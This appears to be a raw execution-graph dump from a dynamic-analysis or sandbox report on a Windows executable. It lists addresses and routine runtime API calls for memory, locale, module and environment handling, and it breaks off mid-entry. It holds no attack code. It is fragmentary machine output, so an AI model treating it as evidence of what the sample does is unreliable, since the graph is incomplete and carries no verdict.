                                                                                                                                                                                                                                                            execution_graph 20493 7ff6e3a7bb70 20494 7ff6e3a7bb75 20493->20494 20498 7ff6e3a7bb8a 20493->20498 20499 7ff6e3a7bb90 20494->20499 20500 7ff6e3a7bbd2 20499->20500 20501 7ff6e3a7bbda 20499->20501 20502 7ff6e3a7b4ec __free_lconv_num 11 API calls 20500->20502 20503 7ff6e3a7b4ec __free_lconv_num 11 API calls 20501->20503 20502->20501 20504 7ff6e3a7bbe7 20503->20504 20505 7ff6e3a7b4ec __free_lconv_num 11 API calls 20504->20505 20506 7ff6e3a7bbf4 20505->20506 20507 7ff6e3a7b4ec __free_lconv_num 11 API calls 20506->20507 20508 7ff6e3a7bc01 20507->20508 20509 7ff6e3a7b4ec __free_lconv_num 11 API calls 20508->20509 20510 7ff6e3a7bc0e 20509->20510 20511 7ff6e3a7b4ec __free_lconv_num 11 API calls 20510->20511 20512 7ff6e3a7bc1b 20511->20512 20513 7ff6e3a7b4ec __free_lconv_num 11 API calls 20512->20513 20514 7ff6e3a7bc28 20513->20514 20515 7ff6e3a7b4ec __free_lconv_num 11 API calls 20514->20515 20516 7ff6e3a7bc35 20515->20516 20517 7ff6e3a7b4ec __free_lconv_num 11 API calls 20516->20517 20518 7ff6e3a7bc45 20517->20518 20519 7ff6e3a7b4ec __free_lconv_num 11 API calls 20518->20519 20520 7ff6e3a7bc55 20519->20520 20525 7ff6e3a7ba38 20520->20525 20539 7ff6e3a81298 EnterCriticalSection 20525->20539 20562 7ff6e3a6a55d 20563 7ff6e3a6a562 20562->20563 20569 7ff6e3a6a6ca 20563->20569 20571 7ff6e3a6a233 20563->20571 20572 7ff6e3a6b750 20563->20572 20564 7ff6e3a6b640 12 API calls 20568 7ff6e3a6a446 20564->20568 20566 7ff6e3a6b750 12 API calls 20567 7ff6e3a6a9d8 20566->20567 20570 7ff6e3a6b750 12 API calls 20567->20570 20569->20566 20569->20571 20570->20571 20571->20564 20571->20568 20573 7ff6e3a6b7b0 20572->20573 20574 7ff6e3a6bcea 20573->20574 20579 7ff6e3a6b7cf 20573->20579 20575 7ff6e3a6bf34 8 API calls 20574->20575 20576 7ff6e3a6bcef 20575->20576 20577 7ff6e3a6be00 _wfindfirst32i64 8 API calls 20578 7ff6e3a6bccc 20577->20578 20578->20569 20579->20577 16080 7ff6e3a6b0cc 16081 7ff6e3a6a3ca 16080->16081 16083 7ff6e3a6a446 16081->16083 16084 7ff6e3a6b640 16081->16084 16085 7ff6e3a6b663 16084->16085 16086 7ff6e3a6b67f memcpy_s 16084->16086 16088 7ff6e3a7e19c 16085->16088 16086->16083 16089 7ff6e3a7e1e7 16088->16089 16093 7ff6e3a7e1ab _get_daylight 16088->16093 16098 7ff6e3a75aa4 16089->16098 16091 7ff6e3a7e1ce RtlAllocateHeap 16092 7ff6e3a7e1e5 16091->16092 16091->16093 16092->16086 16093->16089 16093->16091 16095 7ff6e3a841e0 16093->16095 16101 7ff6e3a84220 16095->16101 16107 7ff6e3a7be68 GetLastError 16098->16107 16100 7ff6e3a75aad 16100->16092 16106 7ff6e3a81298 EnterCriticalSection 16101->16106 16108 7ff6e3a7bea9 FlsSetValue 16107->16108 16109 7ff6e3a7be8c 16107->16109 16110 7ff6e3a7bebb 16108->16110 16114 7ff6e3a7be99 SetLastError 16108->16114 16109->16108 16109->16114 16124 7ff6e3a7f738 16110->16124 16114->16100 16115 7ff6e3a7bee8 FlsSetValue 16118 7ff6e3a7bf06 16115->16118 16119 7ff6e3a7bef4 FlsSetValue 16115->16119 16116 7ff6e3a7bed8 FlsSetValue 16117 7ff6e3a7bee1 16116->16117 16131 7ff6e3a7b4ec 16117->16131 16137 7ff6e3a7ba98 16118->16137 16119->16117 16125 7ff6e3a7f749 _get_daylight 16124->16125 16126 7ff6e3a7f79a 16125->16126 16127 7ff6e3a7f77e RtlAllocateHeap 16125->16127 16130 7ff6e3a841e0 _get_daylight 2 API calls 16125->16130 16128 7ff6e3a75aa4 _get_daylight 10 API calls 16126->16128 16127->16125 16129 7ff6e3a7beca 16127->16129 16128->16129 16129->16115 16129->16116 16130->16125 16132 7ff6e3a7b4f1 RtlRestoreThreadPreferredUILanguages 16131->16132 16134 7ff6e3a7b520 16131->16134 16133 7ff6e3a7b50c GetLastError 16132->16133 16132->16134 16135 7ff6e3a7b519 __free_lconv_num 16133->16135 16134->16114 16136 7ff6e3a75aa4 _get_daylight 9 API calls 16135->16136 16136->16134 16142 7ff6e3a7b970 16137->16142 16154 7ff6e3a81298 EnterCriticalSection 16142->16154 19177 7ff6e3a802cc 19178 7ff6e3a804be 19177->19178 19180 7ff6e3a8030e _isindst 19177->19180 19179 7ff6e3a75aa4 _get_daylight 11 API calls 19178->19179 19197 7ff6e3a804ae 19179->19197 19180->19178 19183 7ff6e3a8038e _isindst 19180->19183 19181 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19182 7ff6e3a804d9 19181->19182 19198 7ff6e3a86ee4 19183->19198 19187 7ff6e3a804ea 19190 7ff6e3a7b4a4 _wfindfirst32i64 17 API calls 19187->19190 19192 7ff6e3a804fe 19190->19192 19195 7ff6e3a803eb 19195->19197 19222 7ff6e3a86f28 19195->19222 19197->19181 19199 7ff6e3a86ef3 19198->19199 19202 7ff6e3a803ac 19198->19202 19229 7ff6e3a81298 EnterCriticalSection 19199->19229 19204 7ff6e3a862e8 19202->19204 19205 7ff6e3a803c1 19204->19205 19206 7ff6e3a862f1 19204->19206 19205->19187 19210 7ff6e3a86318 19205->19210 19207 7ff6e3a75aa4 _get_daylight 11 API calls 19206->19207 19208 7ff6e3a862f6 19207->19208 19209 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19208->19209 19209->19205 19211 7ff6e3a803d2 19210->19211 19212 7ff6e3a86321 19210->19212 19211->19187 19216 7ff6e3a86348 19211->19216 19213 7ff6e3a75aa4 _get_daylight 11 API calls 19212->19213 19214 7ff6e3a86326 19213->19214 19215 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19214->19215 19215->19211 19217 7ff6e3a803e3 19216->19217 19218 7ff6e3a86351 19216->19218 19217->19187 19217->19195 19219 7ff6e3a75aa4 _get_daylight 11 API calls 19218->19219 19220 7ff6e3a86356 19219->19220 19221 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19220->19221 19221->19217 19230 7ff6e3a81298 EnterCriticalSection 19222->19230 19431 7ff6e3a88ad0 19434 7ff6e3a83240 19431->19434 19435 7ff6e3a8324d 19434->19435 19436 7ff6e3a83292 19434->19436 19440 7ff6e3a7bdc4 19435->19440 19441 7ff6e3a7bdd5 FlsGetValue 19440->19441 19442 7ff6e3a7bdf0 FlsSetValue 19440->19442 19444 7ff6e3a7bde2 19441->19444 19445 7ff6e3a7bdea 19441->19445 19443 7ff6e3a7bdfd 19442->19443 19442->19444 19447 7ff6e3a7f738 _get_daylight 11 API calls 19443->19447 19446 7ff6e3a7b07c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19444->19446 19448 7ff6e3a7bde8 19444->19448 19445->19442 19449 7ff6e3a7be65 19446->19449 19450 7ff6e3a7be0c 19447->19450 19460 7ff6e3a82f14 19448->19460 19451 7ff6e3a7be2a FlsSetValue 19450->19451 19452 7ff6e3a7be1a FlsSetValue 19450->19452 19454 7ff6e3a7be48 19451->19454 19455 7ff6e3a7be36 FlsSetValue 19451->19455 19453 7ff6e3a7be23 19452->19453 19456 7ff6e3a7b4ec __free_lconv_num 11 API calls 19453->19456 19457 7ff6e3a7ba98 _get_daylight 11 API calls 19454->19457 19455->19453 19456->19444 19458 7ff6e3a7be50 19457->19458 19459 7ff6e3a7b4ec __free_lconv_num 11 API calls 19458->19459 19459->19448 19483 7ff6e3a83184 19460->19483 19462 7ff6e3a82f49 19498 7ff6e3a82c14 19462->19498 19465 7ff6e3a7e19c _fread_nolock 12 API calls 19466 7ff6e3a82f77 19465->19466 19467 7ff6e3a82f7f 19466->19467 19469 7ff6e3a82f8e 19466->19469 19468 7ff6e3a7b4ec __free_lconv_num 11 API calls 19467->19468 19480 7ff6e3a82f66 19468->19480 19469->19469 19505 7ff6e3a832bc 19469->19505 19472 7ff6e3a8308a 19473 7ff6e3a75aa4 _get_daylight 11 API calls 19472->19473 19474 7ff6e3a8308f 19473->19474 19476 7ff6e3a7b4ec __free_lconv_num 11 API calls 19474->19476 19475 7ff6e3a830e5 19478 7ff6e3a8314c 19475->19478 19516 7ff6e3a82a44 19475->19516 19476->19480 19477 7ff6e3a830a4 19477->19475 19481 7ff6e3a7b4ec __free_lconv_num 11 API calls 19477->19481 19479 7ff6e3a7b4ec __free_lconv_num 11 API calls 19478->19479 19479->19480 19480->19436 19481->19475 19484 7ff6e3a831a7 19483->19484 19485 7ff6e3a831b1 19484->19485 19531 7ff6e3a81298 EnterCriticalSection 19484->19531 19488 7ff6e3a83223 19485->19488 19490 7ff6e3a7b07c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19485->19490 19488->19462 19491 7ff6e3a8323b 19490->19491 19494 7ff6e3a7bdc4 50 API calls 19491->19494 19497 7ff6e3a83292 19491->19497 19495 7ff6e3a8327c 19494->19495 19496 7ff6e3a82f14 65 API calls 19495->19496 19496->19497 19497->19462 19499 7ff6e3a75578 45 API calls 19498->19499 19500 7ff6e3a82c28 19499->19500 19501 7ff6e3a82c46 19500->19501 19502 7ff6e3a82c34 GetOEMCP 19500->19502 19503 7ff6e3a82c5b 19501->19503 19504 7ff6e3a82c4b GetACP 19501->19504 19502->19503 19503->19465 19503->19480 19504->19503 19506 7ff6e3a82c14 47 API calls 19505->19506 19507 7ff6e3a832e9 19506->19507 19508 7ff6e3a8343f 19507->19508 19509 7ff6e3a83326 IsValidCodePage 19507->19509 19515 7ff6e3a83340 __scrt_get_show_window_mode 19507->19515 19510 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19508->19510 19509->19508 19511 7ff6e3a83337 19509->19511 19512 7ff6e3a83081 19510->19512 19513 7ff6e3a83366 GetCPInfo 19511->19513 19511->19515 19512->19472 19512->19477 19513->19508 19513->19515 19532 7ff6e3a82d2c 19515->19532 19588 7ff6e3a81298 EnterCriticalSection 19516->19588 19533 7ff6e3a82d69 GetCPInfo 19532->19533 19534 7ff6e3a82e5f 19532->19534 19533->19534 19540 7ff6e3a82d7c 19533->19540 19535 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19534->19535 19536 7ff6e3a82efe 19535->19536 19536->19508 19537 7ff6e3a83a90 48 API calls 19538 7ff6e3a82df3 19537->19538 19543 7ff6e3a88a34 19538->19543 19540->19537 19542 7ff6e3a88a34 54 API calls 19542->19534 19544 7ff6e3a75578 45 API calls 19543->19544 19545 7ff6e3a88a59 19544->19545 19548 7ff6e3a88700 19545->19548 19549 7ff6e3a88741 19548->19549 19550 7ff6e3a801e0 _fread_nolock MultiByteToWideChar 19549->19550 19554 7ff6e3a8878b 19550->19554 19551 7ff6e3a88a09 19553 7ff6e3a6be00 _wfindfirst32i64 8 API calls 19551->19553 19552 7ff6e3a888c1 19552->19551 19557 7ff6e3a7b4ec __free_lconv_num 11 API calls 19552->19557 19555 7ff6e3a82e26 19553->19555 19554->19551 19554->19552 19556 7ff6e3a7e19c _fread_nolock 12 API calls 19554->19556 19558 7ff6e3a887c3 19554->19558 19555->19542 19556->19558 19557->19551 19558->19552 19559 7ff6e3a801e0 _fread_nolock MultiByteToWideChar 19558->19559 19560 7ff6e3a88836 19559->19560 19560->19552 19579 7ff6e3a7fb84 19560->19579 19563 7ff6e3a88881 19563->19552 19566 7ff6e3a7fb84 __crtLCMapStringW 6 API calls 19563->19566 19564 7ff6e3a888d2 19565 7ff6e3a7e19c _fread_nolock 12 API calls 19564->19565 19567 7ff6e3a889a4 19564->19567 19569 7ff6e3a888f0 19564->19569 19565->19569 19566->19552 19567->19552 19568 7ff6e3a7b4ec __free_lconv_num 11 API calls 19567->19568 19568->19552 19569->19552 19570 7ff6e3a7fb84 __crtLCMapStringW 6 API calls 19569->19570 19571 7ff6e3a88970 19570->19571 19571->19567 19572 7ff6e3a88990 19571->19572 19573 7ff6e3a889a6 19571->19573 19574 7ff6e3a80aa8 WideCharToMultiByte 19572->19574 19575 7ff6e3a80aa8 WideCharToMultiByte 19573->19575 19576 7ff6e3a8899e 19574->19576 19575->19576 19576->19567 19577 7ff6e3a889be 19576->19577 19577->19552 19578 7ff6e3a7b4ec __free_lconv_num 11 API calls 19577->19578 19578->19552 19580 7ff6e3a7f7b0 __crtLCMapStringW 5 API calls 19579->19580 19581 7ff6e3a7fbc2 19580->19581 19582 7ff6e3a7fbca 19581->19582 19585 7ff6e3a7fc70 19581->19585 19582->19552 19582->19563 19582->19564 19584 7ff6e3a7fc33 LCMapStringW 19584->19582 19586 7ff6e3a7f7b0 __crtLCMapStringW 5 API calls 19585->19586 19587 7ff6e3a7fc9e __crtLCMapStringW 19586->19587 19587->19584 19298 7ff6e3a7a4d1 19299 7ff6e3a7af48 45 API calls 19298->19299 19300 7ff6e3a7a4d6 19299->19300 19301 7ff6e3a7a4fd GetModuleHandleW 19300->19301 19302 7ff6e3a7a547 19300->19302 19301->19302 19308 7ff6e3a7a50a 19301->19308 19310 7ff6e3a7a3d4 19302->19310 19308->19302 19324 7ff6e3a7a5f8 GetModuleHandleExW 19308->19324 19330 7ff6e3a81298 EnterCriticalSection 19310->19330 19325 7ff6e3a7a62c GetProcAddress 19324->19325 19326 7ff6e3a7a655 19324->19326 19327 7ff6e3a7a63e 19325->19327 19328 7ff6e3a7a65a FreeLibrary 19326->19328 19329 7ff6e3a7a661 19326->19329 19327->19326 19328->19329 19329->19302 19589 7ff6e3a6c0d0 19590 7ff6e3a6c0e0 19589->19590 19606 7ff6e3a7a718 19590->19606 19592 7ff6e3a6c0ec 19612 7ff6e3a6c3c8 19592->19612 19594 7ff6e3a6c159 19595 7ff6e3a6c6ac 7 API calls 19594->19595 19605 7ff6e3a6c175 19594->19605 19597 7ff6e3a6c185 19595->19597 19596 7ff6e3a6c104 _RTC_Initialize 19596->19594 19617 7ff6e3a6c578 19596->19617 19599 7ff6e3a6c119 19620 7ff6e3a79b84 19599->19620 19607 7ff6e3a7a729 19606->19607 19608 7ff6e3a75aa4 _get_daylight 11 API calls 19607->19608 19611 7ff6e3a7a731 19607->19611 19609 7ff6e3a7a740 19608->19609 19610 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19609->19610 19610->19611 19611->19592 19613 7ff6e3a6c3d9 19612->19613 19616 7ff6e3a6c3de __scrt_acquire_startup_lock 19612->19616 19614 7ff6e3a6c6ac 7 API calls 19613->19614 19613->19616 19615 7ff6e3a6c452 19614->19615 19616->19596 19645 7ff6e3a6c53c 19617->19645 19619 7ff6e3a6c581 19619->19599 19621 7ff6e3a79ba4 19620->19621 19643 7ff6e3a6c125 19620->19643 19622 7ff6e3a79bac 19621->19622 19623 7ff6e3a79bc2 GetModuleFileNameW 19621->19623 19624 7ff6e3a75aa4 _get_daylight 11 API calls 19622->19624 19627 7ff6e3a79bed 19623->19627 19625 7ff6e3a79bb1 19624->19625 19626 7ff6e3a7b484 _invalid_parameter_noinfo 37 API calls 19625->19626 19626->19643 19660 7ff6e3a79b24 19627->19660 19630 7ff6e3a79c4d 19635 7ff6e3a79c6f 19630->19635 19637 7ff6e3a79c9b 19630->19637 19638 7ff6e3a79cb4 19630->19638 19631 7ff6e3a79c35 19632 7ff6e3a75aa4 _get_daylight 11 API calls 19631->19632 19633 7ff6e3a79c3a 19632->19633 19634 7ff6e3a7b4ec __free_lconv_num 11 API calls 19633->19634 19634->19643 19636 7ff6e3a7b4ec __free_lconv_num 11 API calls 19635->19636 19636->19643 19639 7ff6e3a7b4ec __free_lconv_num 11 API calls 19637->19639 19640 7ff6e3a7b4ec __free_lconv_num 11 API calls 19638->19640 19641 7ff6e3a79ca4 19639->19641 19640->19635 19642 7ff6e3a7b4ec __free_lconv_num 11 API calls 19641->19642 19642->19643 19643->19594 19644 7ff6e3a6c64c InitializeSListHead 19643->19644 19646 7ff6e3a6c556 19645->19646 19648 7ff6e3a6c54f 19645->19648 19649 7ff6e3a7ad5c 19646->19649 19648->19619 19652 7ff6e3a7a998 19649->19652 19659 7ff6e3a81298 EnterCriticalSection 19652->19659 19661 7ff6e3a79b3c 19660->19661 19665 7ff6e3a79b74 19660->19665 19662 7ff6e3a7f738 _get_daylight 11 API calls 19661->19662 19661->19665 19663 7ff6e3a79b6a 19662->19663 19664 7ff6e3a7b4ec __free_lconv_num 11 API calls 19663->19664 19664->19665 19665->19630 19665->19631 16156 7ff6e3a6c1bc 16179 7ff6e3a6c38c 16156->16179 16159 7ff6e3a6c308 16283 7ff6e3a6c6ac IsProcessorFeaturePresent 16159->16283 16160 7ff6e3a6c1d8 __scrt_acquire_startup_lock 16162 7ff6e3a6c312 16160->16162 16164 7ff6e3a6c1f6 16160->16164 16163 7ff6e3a6c6ac 7 API calls 16162->16163 16166 7ff6e3a6c31d __FrameHandler3::FrameUnwindToEmptyState 16163->16166 16165 7ff6e3a6c21b 16164->16165 16170 7ff6e3a6c238 __scrt_release_startup_lock 16164->16170 16268 7ff6e3a7a348 16164->16268 16168 7ff6e3a6c2a1 16185 7ff6e3a6c7f4 16168->16185 16170->16168 16272 7ff6e3a7a69c 16170->16272 16171 7ff6e3a6c2a6 16188 7ff6e3a61000 16171->16188 16176 7ff6e3a6c2c9 16176->16166 16279 7ff6e3a6c510 16176->16279 16180 7ff6e3a6c394 16179->16180 16181 7ff6e3a6c3a0 __scrt_dllmain_crt_thread_attach 16180->16181 16182 7ff6e3a6c1d0 16181->16182 16183 7ff6e3a6c3ad 16181->16183 16182->16159 16182->16160 16183->16182 16290 7ff6e3a6cfb0 16183->16290 16317 7ff6e3a8b380 16185->16317 16187 7ff6e3a6c80b GetStartupInfoW 16187->16171 16189 7ff6e3a6100b 16188->16189 16319 7ff6e3a687a0 16189->16319 16191 7ff6e3a6101d 16326 7ff6e3a764d8 16191->16326 16193 7ff6e3a639ab 16333 7ff6e3a61ea0 16193->16333 16199 7ff6e3a639ca 16266 7ff6e3a63ab2 16199->16266 16349 7ff6e3a67b60 16199->16349 16201 7ff6e3a639ff 16202 7ff6e3a63a4b 16201->16202 16204 7ff6e3a67b60 61 API calls 16201->16204 16364 7ff6e3a68040 16202->16364 16208 7ff6e3a63a20 __std_exception_copy 16204->16208 16205 7ff6e3a63a60 16368 7ff6e3a61ca0 16205->16368 16208->16202 16212 7ff6e3a68040 58 API calls 16208->16212 16209 7ff6e3a63b2d 16210 7ff6e3a63b8d 16209->16210 16387 7ff6e3a68970 16209->16387 16214 7ff6e3a63bdb 16210->16214 16210->16266 16411 7ff6e3a68bd0 16210->16411 16211 7ff6e3a61ca0 121 API calls 16213 7ff6e3a63a96 16211->16213 16212->16202 16217 7ff6e3a63a9a 16213->16217 16218 7ff6e3a63ab7 16213->16218 16425 7ff6e3a66de0 16214->16425 16487 7ff6e3a62b10 16217->16487 16218->16209 16500 7ff6e3a63fc0 16218->16500 16220 7ff6e3a63bc0 16224 7ff6e3a63b53 16220->16224 16225 7ff6e3a63bce SetDllDirectoryW 16220->16225 16230 7ff6e3a62b10 59 API calls 16224->16230 16225->16214 16229 7ff6e3a63ad5 16236 7ff6e3a62b10 59 API calls 16229->16236 16230->16266 16233 7ff6e3a63bf5 16258 7ff6e3a63c27 16233->16258 16541 7ff6e3a665f0 16233->16541 16234 7ff6e3a63b03 16234->16209 16237 7ff6e3a63b08 16234->16237 16235 7ff6e3a63ce6 16429 7ff6e3a634a0 16235->16429 16236->16266 16519 7ff6e3a7076c 16237->16519 16243 7ff6e3a63c46 16249 7ff6e3a63c88 16243->16249 16577 7ff6e3a61ee0 16243->16577 16244 7ff6e3a63c29 16247 7ff6e3a66840 FreeLibrary 16244->16247 16247->16258 16249->16266 16581 7ff6e3a63440 16249->16581 16251 7ff6e3a63d00 16437 7ff6e3a67fd0 16251->16437 16252 7ff6e3a63c18 16571 7ff6e3a66c30 16252->16571 16256 7ff6e3a63d13 16259 7ff6e3a67b60 61 API calls 16256->16259 16257 7ff6e3a63cc1 16261 7ff6e3a66840 FreeLibrary 16257->16261 16258->16235 16258->16243 16260 7ff6e3a63d1f 16259->16260 16444 7ff6e3a68080 16260->16444 16261->16266 16523 7ff6e3a6be00 16266->16523 16269 7ff6e3a7a34d 16268->16269 16270 7ff6e3a7a37e 16268->16270 16269->16270 19149 7ff6e3a758f0 16269->19149 16270->16170 16273 7ff6e3a7a6d4 16272->16273 16274 7ff6e3a7a6b3 16272->16274 19172 7ff6e3a7af48 16273->19172 16274->16168 16277 7ff6e3a6c838 GetModuleHandleW 16278 7ff6e3a6c849 16277->16278 16278->16176 16281 7ff6e3a6c521 16279->16281 16280 7ff6e3a6c2e0 16280->16165 16281->16280 16282 7ff6e3a6cfb0 7 API calls 16281->16282 16282->16280 16284 7ff6e3a6c6d2 _wfindfirst32i64 __scrt_get_show_window_mode 16283->16284 16285 7ff6e3a6c6f1 RtlCaptureContext RtlLookupFunctionEntry 16284->16285 16286 7ff6e3a6c71a RtlVirtualUnwind 16285->16286 16287 7ff6e3a6c756 __scrt_get_show_window_mode 16285->16287 16286->16287 16288 7ff6e3a6c788 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16287->16288 16289 7ff6e3a6c7d6 _wfindfirst32i64 16288->16289 16289->16162 16291 7ff6e3a6cfb8 16290->16291 16292 7ff6e3a6cfc2 16290->16292 16296 7ff6e3a6d354 16291->16296 16292->16182 16297 7ff6e3a6d363 16296->16297 16298 7ff6e3a6cfbd 16296->16298 16304 7ff6e3a6e350 16297->16304 16300 7ff6e3a6d3c0 16298->16300 16301 7ff6e3a6d3eb 16300->16301 16302 7ff6e3a6d3ce DeleteCriticalSection 16301->16302 16303 7ff6e3a6d3ef 16301->16303 16302->16301 16303->16292 16308 7ff6e3a6e1b8 16304->16308 16309 7ff6e3a6e2a2 TlsFree 16308->16309 16315 7ff6e3a6e1fc __vcrt_InitializeCriticalSectionEx 16308->16315 16310 7ff6e3a6e22a LoadLibraryExW 16312 7ff6e3a6e24b GetLastError 16310->16312 16313 7ff6e3a6e2c9 16310->16313 16311 7ff6e3a6e2e9 GetProcAddress 16311->16309 16312->16315 16313->16311 16314 7ff6e3a6e2e0 FreeLibrary 16313->16314 16314->16311 16315->16309 16315->16310 16315->16311 16316 7ff6e3a6e26d LoadLibraryExW 16315->16316 16316->16313 16316->16315 16318 7ff6e3a8b370 16317->16318 16318->16187 16318->16318 16321 7ff6e3a687bf 16319->16321 16320 7ff6e3a68810 WideCharToMultiByte 16320->16321 16323 7ff6e3a688b6 16320->16323 16321->16320 16322 7ff6e3a68864 WideCharToMultiByte 16321->16322 16321->16323 16325 7ff6e3a687c7 __std_exception_copy 16321->16325 16322->16321 16322->16323 16615 7ff6e3a629c0 16323->16615 16325->16191 16328 7ff6e3a80630 16326->16328 16327 7ff6e3a7b3b8 _invalid_parameter_noinfo 37 API calls 16332 7ff6e3a806ac 16327->16332 16329 7ff6e3a806d6 16328->16329 16330 7ff6e3a80683 16328->16330 17053 7ff6e3a80508 16329->17053 16330->16327 16332->16193 16334 7ff6e3a61eb5 16333->16334 16335 7ff6e3a61ed0 16334->16335 17061 7ff6e3a62870 16334->17061 16335->16266 16337 7ff6e3a63eb0 16335->16337 16338 7ff6e3a6bda0 16337->16338 16339 7ff6e3a63ebc GetModuleFileNameW 16338->16339 16340 7ff6e3a63eeb 16339->16340 16341 7ff6e3a63f02 16339->16341 16342 7ff6e3a629c0 57 API calls 16340->16342 17101 7ff6e3a68ce0 16341->17101 16344 7ff6e3a63efe 16342->16344 16347 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16344->16347 16346 7ff6e3a62b10 59 API calls 16346->16344 16348 7ff6e3a63f3f 16347->16348 16348->16199 16350 7ff6e3a67b6a 16349->16350 16351 7ff6e3a68bd0 57 API calls 16350->16351 16352 7ff6e3a67b8c GetEnvironmentVariableW 16351->16352 16353 7ff6e3a67bf6 16352->16353 16354 7ff6e3a67ba4 ExpandEnvironmentStringsW 16352->16354 16355 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16353->16355 16356 7ff6e3a68ce0 59 API calls 16354->16356 16358 7ff6e3a67c08 16355->16358 16357 7ff6e3a67bcc 16356->16357 16357->16353 16359 7ff6e3a67bd6 16357->16359 16358->16201 17112 7ff6e3a7af7c 16359->17112 16362 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16363 7ff6e3a67bee 16362->16363 16363->16201 16365 7ff6e3a68bd0 57 API calls 16364->16365 16366 7ff6e3a68057 SetEnvironmentVariableW 16365->16366 16367 7ff6e3a6806f __std_exception_copy 16366->16367 16367->16205 16369 7ff6e3a61cae 16368->16369 16370 7ff6e3a61ee0 49 API calls 16369->16370 16371 7ff6e3a61ce4 16370->16371 16372 7ff6e3a61ee0 49 API calls 16371->16372 16382 7ff6e3a61dce 16371->16382 16373 7ff6e3a61d0a 16372->16373 16373->16382 17119 7ff6e3a61a90 16373->17119 16374 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16375 7ff6e3a61e5c 16374->16375 16375->16209 16375->16211 16379 7ff6e3a61dbc 16380 7ff6e3a63e30 49 API calls 16379->16380 16380->16382 16381 7ff6e3a61d7f 16381->16379 16383 7ff6e3a61e24 16381->16383 16382->16374 16384 7ff6e3a63e30 49 API calls 16383->16384 16385 7ff6e3a61e31 16384->16385 17155 7ff6e3a64040 16385->17155 16388 7ff6e3a68985 16387->16388 17197 7ff6e3a68650 GetCurrentProcess OpenProcessToken 16388->17197 16391 7ff6e3a68650 7 API calls 16392 7ff6e3a689b1 16391->16392 16393 7ff6e3a689ca 16392->16393 16394 7ff6e3a689e4 16392->16394 17207 7ff6e3a68740 16393->17207 16396 7ff6e3a68740 48 API calls 16394->16396 16398 7ff6e3a689f7 LocalFree LocalFree 16396->16398 16399 7ff6e3a68a13 16398->16399 16401 7ff6e3a68a1f 16398->16401 17211 7ff6e3a62c30 16399->17211 16402 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16401->16402 16403 7ff6e3a63b4e 16402->16403 16403->16224 16404 7ff6e3a614e0 16403->16404 16405 7ff6e3a614f6 16404->16405 16408 7ff6e3a6156f 16404->16408 17418 7ff6e3a67950 16405->17418 16408->16210 16409 7ff6e3a62b10 59 API calls 16410 7ff6e3a61554 16409->16410 16410->16210 16412 7ff6e3a68c77 MultiByteToWideChar 16411->16412 16413 7ff6e3a68bf1 MultiByteToWideChar 16411->16413 16416 7ff6e3a68c9a 16412->16416 16417 7ff6e3a68cbf 16412->16417 16414 7ff6e3a68c3c 16413->16414 16415 7ff6e3a68c17 16413->16415 16414->16412 16422 7ff6e3a68c52 16414->16422 16418 7ff6e3a629c0 55 API calls 16415->16418 16419 7ff6e3a629c0 55 API calls 16416->16419 16417->16220 16420 7ff6e3a68c2a 16418->16420 16421 7ff6e3a68cad 16419->16421 16420->16220 16421->16220 16423 7ff6e3a629c0 55 API calls 16422->16423 16424 7ff6e3a68c65 16423->16424 16424->16220 16426 7ff6e3a66df5 16425->16426 16427 7ff6e3a63be0 16426->16427 16428 7ff6e3a62870 59 API calls 16426->16428 16427->16258 16532 7ff6e3a66a90 16427->16532 16428->16427 16433 7ff6e3a63513 16429->16433 16435 7ff6e3a63554 16429->16435 16430 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16431 7ff6e3a635a5 16430->16431 16431->16266 16436 7ff6e3a68940 LocalFree 16431->16436 16433->16435 17750 7ff6e3a61700 16433->17750 17792 7ff6e3a62d50 16433->17792 16435->16430 16436->16251 16438 7ff6e3a68bd0 57 API calls 16437->16438 16439 7ff6e3a67fef 16438->16439 16440 7ff6e3a68bd0 57 API calls 16439->16440 16441 7ff6e3a67fff 16440->16441 16442 7ff6e3a783cc 38 API calls 16441->16442 16443 7ff6e3a6800d __std_exception_copy 16442->16443 16443->16256 16445 7ff6e3a68090 16444->16445 16446 7ff6e3a68bd0 57 API calls 16445->16446 16447 7ff6e3a680c1 SetConsoleCtrlHandler GetStartupInfoW 16446->16447 16448 7ff6e3a68122 16447->16448 18269 7ff6e3a7aff4 16448->18269 16488 7ff6e3a62b30 16487->16488 16489 7ff6e3a750a4 49 API calls 16488->16489 16490 7ff6e3a62b7b __scrt_get_show_window_mode 16489->16490 16491 7ff6e3a68bd0 57 API calls 16490->16491 16492 7ff6e3a62bb0 16491->16492 16493 7ff6e3a62bed MessageBoxA 16492->16493 16494 7ff6e3a62bb5 16492->16494 16496 7ff6e3a62c07 16493->16496 16495 7ff6e3a68bd0 57 API calls 16494->16495 16498 7ff6e3a62bcf MessageBoxW 16495->16498 16497 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16496->16497 16499 7ff6e3a62c17 16497->16499 16498->16496 16499->16266 16501 7ff6e3a63fcc 16500->16501 16502 7ff6e3a68bd0 57 API calls 16501->16502 16503 7ff6e3a63ff7 16502->16503 16504 7ff6e3a68bd0 57 API calls 16503->16504 16505 7ff6e3a6400a 16504->16505 18325 7ff6e3a76a88 16505->18325 16508 7ff6e3a6be00 _wfindfirst32i64 8 API calls 16509 7ff6e3a63acd 16508->16509 16509->16229 16510 7ff6e3a682b0 16509->16510 16511 7ff6e3a682d4 16510->16511 16512 7ff6e3a683ab __std_exception_copy 16511->16512 16513 7ff6e3a70df4 73 API calls 16511->16513 16512->16234 16514 7ff6e3a682ee 16513->16514 16514->16512 18704 7ff6e3a79650 16514->18704 16516 7ff6e3a68303 16516->16512 16517 7ff6e3a70df4 73 API calls 16516->16517 16518 7ff6e3a70abc _fread_nolock 53 API calls 16516->16518 16517->16516 16518->16516 16520 7ff6e3a7079c 16519->16520 18719 7ff6e3a70548 16520->18719 16522 